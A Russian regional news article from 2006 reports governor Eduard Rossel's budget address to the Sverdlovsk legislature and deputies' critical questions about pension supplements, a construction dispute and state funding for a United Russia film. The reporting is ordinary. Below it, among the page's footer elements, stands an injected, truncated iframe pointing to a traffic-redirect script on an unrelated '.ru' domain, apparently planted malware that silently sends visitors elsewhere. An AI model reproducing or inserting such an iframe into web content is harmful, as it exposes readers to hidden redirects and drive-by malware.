Россель в пути на Мангазею

Политсовет, 26.10.2006. Сегодня депутаты Областной Думы и Палаты Представителей Законодательного Собрания Свердловской области собрались в необычном для себя месте. Совместное заседание палат, на котором выступал губернатор Свердловской области Эдуард Россель с докладом о внутреннем и внешнем положении области, прошло в здании «Атриум Палас Отеля».
На заседании присутствовали 26 депутатов Областной Думы из 28 и 14 сенаторов из 21. Также в конференц-зале присутствовали различные руководители силовых структур, главы районов и муниципальных образований.
Стоит отметить, что журналисты наблюдали за ходом заседания из специальной комнаты, где был установлен проектор, транслирующий на экран выступление Росселя.
«Бюджет Свердловской области в 2007 году составит 73 миллиарда рублей. Прогнозируемый рост доходов к уровню 2006 года будет около 23 процентов», — пообещал Эдуард Россель.
«Консолидированный бюджет составит 93 миллиарда рублей, на «социалку» будет затрачено 46 процентов расходов, на нужды экономики — около 12 процентов, а 29 процентов составят межбюджетные трансферты», — сообщил Эдуард Россель.
76 процентов, по словам губернатора, будет выделено на реализацию национальных проектов.
После чтения самого доклада, который губернатор закончил интересным замечанием: «Одной рукой в ладоши не похлопаешь», Россель стал отвечать на вопросы депутатов.
Первый же вопрос, как и большинство последующих, оказался для губернатора «неудобным». Его задал Георгий Перский, спросивший о законопроекте о пенсионерах и возможной дополнительной региональной прибавке к пенсиям.
Россель ответил на вопрос Перского довольно невнятно, сказав следующее: «Пенсии — это федеральное дело, и нам эту проблему реализовать нельзя. Вы законодатели. Вы и решайте».
Позже Перский в куларах заявил, что Россель «рассказывает сказки» и что в более чем 50 субъектах РФ есть региональные пенсионные надбавки. Кстати, сам свердловский губернатор на очередных выборах обещал ввести региональную надбавку. Однако, как известно, ее нет до сих пор.
Ещё раз Россель «отличился», когда поддержал Владимира Конькова, формально избиравшегося от Российской партии пенсионеров. Последний просил у губернатора «защиты» от администрации Екатеринбурга. Таким образом, как отмечают наблюдатели, Россель в споре администрации города, которая включила строительную корпорацию «Маяк» в список «чёрных застройщиков», и Конькова встал на сторону последнего и фактически поддержал его деятельность. Безусловно, все это приводит к мысли, что областная власть опять готовится начать очередной этап борьбы за фактическое уничтожение местного самоуправления в Екатеринбурге.
Дмитрий Уткин, депутат Облдумы от Российской партии ЖИЗНИ, задал совершенно законный вопрос о расходовании бюджетных денег:
«Насколько оправданным является финансирование из областного бюджета некоего фильма «Путь на Мангазею», который, по сообщению «Областной газеты», является идеологическим проектом «Единой России»?»
Губернатор в своем ответе показал достаточно безразличное отношение к данному «творческому» проекту «Единой России».
«Вы можете вызвать на заседание Облдумы главного постановщика, представителей Министерства культуры. Но как вы проголосуете, так и проголосуете», — ответил Э. Россель.
Затем губернатор фактически ушел от основной темы и «сел на любимого конька», заговорив о цифровом телевидении и его распространении по территории области. Россель также добавил: «После введения этой технологии в сельских клубах можно будет смотреть любые фильмы, в том числе и про «Мангазею».
«Я ответом Росселя не удовлетворён. Губернатор про финансирование идеологических проектов «Единой России» ничего не ответил. Он рассказал о цифровом телевидении, а его финансирование в бюджет не заложено. Пусть деньги на этот фильм выделяет сама партия «Единая Россия», — заявил позже Дмитрий Уткин.
<iframe src="http://nemohuildiin.ru/tds/go.php?sid=

Нажмите для вставки кода в блог
Распечатать

Архив Новостей

«    Июнь 2019    »
ПнВтСрЧтПтСбВс
 12
3456789
10111213141516
17181920212223
24252627282930

Контакты